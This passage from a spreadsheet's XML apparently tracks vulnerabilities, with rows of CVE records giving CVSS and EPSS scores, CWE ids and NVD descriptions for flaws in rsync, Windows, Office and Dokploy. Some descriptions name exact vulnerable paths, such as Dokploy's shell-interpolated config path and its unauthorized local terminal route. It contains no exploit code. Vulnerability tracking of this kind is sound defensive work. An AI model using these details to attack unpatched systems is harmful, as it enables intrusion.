    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70456</t>
        </is>
      </c>
      <c r="C911" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="inlineStr"/>
      <c r="I911" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L911" s="5" t="inlineStr">
        <is>
          <t>rsync 3.0.1 before 3.5.0 contains an out-of-bounds write vulnerability in the read_args() function that allows a malicious sender to corrupt adjacent heap memory by sending a crafted argument list. When the argument count causes the argv allocation to be exactly full, the trailing NULL terminator is written one slot beyond the allocation boundary, corrupting adjacent heap memory.</t>
        </is>
      </c>
      <c r="M911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70456</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70458</t>
        </is>
      </c>
      <c r="C912" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="inlineStr"/>
      <c r="I912" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L912" s="5" t="inlineStr">
        <is>
          <t>rsync 3.0.0 before 3.5.0 contains an out-of-bounds write vulnerability that allows attackers to corrupt memory by triggering HLINK_BUMP processing on file entries with the FLAG_HLINKED flag set while the hard-link preservation option is inactive. Attackers can exploit the missing F_SUM field in the file_struct layout to access memory past the end of the allocated structure, corrupting adjacent heap or stack data.</t>
        </is>
      </c>
      <c r="M912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70458</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="C913" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G913" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H913" s="5" t="inlineStr"/>
      <c r="I913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L913" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="C914" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="inlineStr"/>
      <c r="I914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L914" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="C915" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G915" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H915" s="5" t="inlineStr"/>
      <c r="I915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L915" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="C916" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E916" s="5" t="inlineStr"/>
      <c r="F916" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G916" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H916" s="5" t="inlineStr"/>
      <c r="I916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L916" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71694</t>
        </is>
      </c>
      <c r="C917" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E917" s="5" t="inlineStr"/>
      <c r="F917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="inlineStr"/>
      <c r="I917" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L917" s="5" t="inlineStr">
        <is>
          <t>An issue in Berkeley Out-of-Order Machine (BOOM) / BoomTile RTL benchmark v1.2 2d08d0d8b4563212175212f9db0e69f6e68c9619 allows a remote attacker to execute arbitrary code via the CSR trap-return state restoration logic, MRET handling logic, mstatus.MPRV update path, CSRFile logic in ProcessorFuzz BOOM benchmark Benchmarks/Verilog/SmallBoomTile_v1.2_state.v</t>
        </is>
      </c>
      <c r="M917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71694</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71808</t>
        </is>
      </c>
      <c r="C918" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G918" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H918" s="5" t="inlineStr"/>
      <c r="I918" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote authenticated attackers to execute arbitrary SQL commands via the ${} string concatenation in AdminMapper.java and multiple other Mapper files (including MerchantWithdrawRecordMapper.java and MemberWithdrawRecordMapper.java).</t>
        </is>
      </c>
      <c r="M918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71808</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72866</t>
        </is>
      </c>
      <c r="C919" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="inlineStr"/>
      <c r="I919" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L919" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the WebSocket handler in apps/dokploy/server/wss/terminal.ts validates a session but does not authorize access to the requested server. An authenticated user can connect to /terminal?serverId=local, select the special serverId=local branch, and obtain an interactive terminal on the Dokploy host without an organization role or server-access check. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72866</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72875</t>
        </is>
      </c>
      <c r="C920" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="inlineStr"/>
      <c r="I920" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L920" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, settings.readTraefikFile in apps/dokploy/server/api/routers/settings.ts passes a path accepted by apiReadTraefikConfig to readConfigInPath in packages/server/src/utils/traefik/application.ts, where configPath is interpolated into execAsyncRemote as cat ${configPath}, allowing a user with traefikFiles.read permission to execute arbitrary commands on a managed server through shell metacharacters. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72875</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72883</t>
        </is>
      </c>
      <c r="C921" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G921" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H921" s="5" t="inlineStr"/>
      <c r="I921" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L921" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the WebSocket handlers in apps/dokploy/server/wss/terminal.ts, apps/dokploy/server/wss/docker-container-terminal.ts, apps/dokploy/server/wss/docker-container-logs.ts, and apps/dokploy/server/wss/docker-stats.ts validate organization membership but do not enforce checkServiceAccess, accessedServerIds, or accessedServices, allowing an authenticated organization member to obtain root terminal access and read logs or statistics for restricted servers and services. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72883</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="C922" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G922" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H922" s="5" t="inlineStr"/>
      <c r="I922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L922" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="C923" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G923" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H923" s="5" t="inlineStr"/>
      <c r="I923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L923" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="C924" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E924" s="5" t="inlineStr"/>
      <c r="F924" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G924" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H924" s="5" t="inlineStr"/>
      <c r="I924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L924" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="C925" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E925" s="5" t="inlineStr"/>
      <c r="F925" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G925" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H925" s="5" t="inlineStr"/>
      <c r="I925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L925" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="C926" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E926" s="5" t="inlineStr"/>
      <c r="F926" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G926" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H926" s="5" t="inlineStr"/>
      <c r="I926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L926" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="C927" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E927" s="5" t="inlineStr"/>
      <c r="F927" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G927" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H927" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L927" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="C928" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E928" s="5" t="inlineStr"/>
      <c r="F928" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G928" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H928" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L928" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72986</t>
        </is>
      </c>
      <c r="C929" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E929" s="5" t="inlineStr"/>
      <c r="F929" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="inlineStr"/>
      <c r="I929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L929" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="C930" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E930" s="5" t="inlineStr"/>
      <c r="F930" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G930" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H93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30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L930" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="C931" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G931" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H931" s="5" t="inlineStr"/>
      <c r="I931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L931" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="C932" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G932" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H932" s="5" t="inlineStr"/>
      <c r="I932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L932" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="C933" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G933" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H9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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L933" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73018</t>
        </is>
      </c>
      <c r="C934" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D934" s="5" t="inlineStr">
